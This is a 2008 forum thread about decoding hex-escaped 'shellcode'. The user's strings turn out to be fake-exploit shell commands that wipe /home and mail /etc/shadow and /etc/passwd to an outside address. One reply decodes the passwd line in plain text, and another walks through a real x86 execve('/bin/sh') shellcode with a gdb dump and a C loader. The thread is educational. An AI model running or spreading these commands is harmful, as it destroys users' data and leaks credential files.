Decoding shellcode?

Post by **ayu** » 27 Mar 2008, 04:25

Ok so i experimented with some shellcode yesterday, which resulted in the removal of my home folder.....not very amusing i thought. But i have a routine on how i configure all my programs so it didn't take that long to recover it all, and no important files were lost.

Now, i know what these codes do, but i am curious to how i would decode them, does anyone know? I read something about using unescape() to decode when percent-encoding is used. Anyway...does anyone know how i would decode these three shellcodes?

Code: Select all

\x2f\x62\x69\x6e\x2f\x72\x6d\x20
\x2d\x72\x66\x20\x2f\x68\x6f\x6d
\x65\x2f\x2a\x3b\x63\x6c\x65\x61
\x72\x3b\x65\x63\x68\x6f\x20\x62
\x6c\x34\x63\x6b\x68\x34\x74\x2c
\x68\x65\x68\x65

Code: Select all

\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73
\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69
\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69
\x73\x63\x6c\x6f\x73\x75\x72\x65\x40
\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b
\x2e\x6f\x72\x67\x2e\x75\x6b\x20

Code: Select all

\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70
\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69
\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69
\x73\x63\x6c\x6f\x73\x75\x72\x65\x40
\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b
\x2e\x6f\x72\x67\x2e\x75\x6b\x20

G-Brain · Post by **G-Brain** » 27 Mar 2008, 05:51

Uh... alert.

Nerdz · Post by **Nerdz** » 27 Mar 2008, 06:06

javasXXcript:alXXert("\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20
\x7c\x6d\x61\x69\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69\x73\x63\x6c\x6f\x73\x75\x72\x65
\x40\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b\x2e\x6f\x72\x67\x2e\x75\x6b\x20")

which is:
cat etc/passwd |mail full-disclosure@lists.grok.org.uk

You can do the same for the rest of your shellcode...

Post by **ayu** » 27 Mar 2008, 06:12

yay! ^^ Thanks Nerdz

Lyecdevf · Post by **Lyecdevf** » 27 Mar 2008, 06:28

Yeah, be careful with what you put on your system. Once I had to reinstall because I used some thing that I did not know what it was.

bubzuru · Post by **bubzuru** » 27 Mar 2008, 12:19

wtf that wont work with real shellcode lol

shellcode if just hexadecimal opcodes

take a look at this example

Code: Select all

main()
{
        __asm__("
	        xorl  %eax,%eax
       		pushl %eax
        	pushl $0x68732f2f
        	pushl $0x6e69622f
        	movl  %esp, %ebx
        	pushl %eax
        	pushl %ebx
        	movl  %esp, %ecx
        	xorl  %edx, %edx
        	movb  $0xb, %eax
        	int $0x80"
        );
}

Code: Select all

$ gdb ./sc
(gdb) disas main
Dump of assembler code for function main:
0x8048380 <main>:       push   %ebp
0x8048381 <main+1>:     mov    %esp,%ebp
0x8048383 <main+3>:     xor    %eax,%eax
0x8048385 <main+5>:     push   %eax
0x8048386 <main+6>:     push   $0x68732f2f
0x804838b <main+11>:    push   $0x6e69622f
0x8048390 <main+16>:    mov    %esp,%ebx
0x8048392 <main+18>:    push   %eax
0x8048393 <main+19>:    push   %ebx
0x8048394 <main+20>:    mov    %esp,%ecx
0x8048396 <main+22>:    xor    %edx,%edx
0x8048398 <main+24>:    mov    $0xb,%al
0x804839a <main+26>:    int    $0x80
0x804839c <main+28>:    leave
0x804839d <main+29>:    ret
End of assembler dump.
(gdb) x/bx main+3
0x8048383 <main+3>:     0x31
(gdb) x/bx main+4
0x8048384 <main+4>:     0xc0
(gdb)
0x8048385 <main+5>:     0x50
(gdb)
0x8048386 <main+6>:     0x68
(gdb)
0x8048387 <main+7>:     0x2f
(gdb)
0x8048388 <main+8>:     0x2f
(gdb)
0x8048389 <main+9>:     0x73
(gdb)
0x804838a <main+10>:    0x68
(gdb)
0x804838b <main+11>:    0x68
(gdb)
0x804838c <main+12>:    0x2f
(gdb)
0x804838d <main+13>:    0x62
(gdb)
0x804838e <main+14>:    0x69
(gdb)
0x804838f <main+15>:    0x6e
(gdb)
0x8048390 <main+16>:    0x89
(gdb)
0x8048391 <main+17>:    0xe3
(gdb)
0x8048392 <main+18>:    0x50
(gdb)
0x8048393 <main+19>:    0x53
(gdb)
0x8048394 <main+20>:    0x89
(gdb)
0x8048395 <main+21>:    0xe1
(gdb)
0x8048396 <main+22>:    0x31
(gdb)
0x8048397 <main+23>:    0xd2
(gdb)
0x8048398 <main+24>:    0xb0
(gdb)
0x8048399 <main+25>:    0x0b
(gdb)
0x804839a <main+26>:    0xcd
(gdb)
0x804839b <main+27>:    0x80
(gdb)

Code: Select all

char sc[] =
        "\x31\xc0"              /* xor %eax, %eax       */
        "\x50"                  /* push %eax            */
        "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f     */
        "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f     */
        "\x89\xe3"              /* mov  %esp,%ebx       */
        "\x50"                  /* push %eax            */
        "\x53"                  /* push %ebx            */
        "\x89\xe1"              /* mov  %esp,%ecx       */
        "\x31\xd2"              /* xor  %edx,%edx       */
        "\xb0\x0b"              /* mov  $0xb,%al        */
        "\xcd\x80";             /* int  $0x80           */

main()
{
        void (*fp) (void);

        fp = (void *)sc;
        fp();
}

http://www.enderunix.org/docs/en/sc-en.txt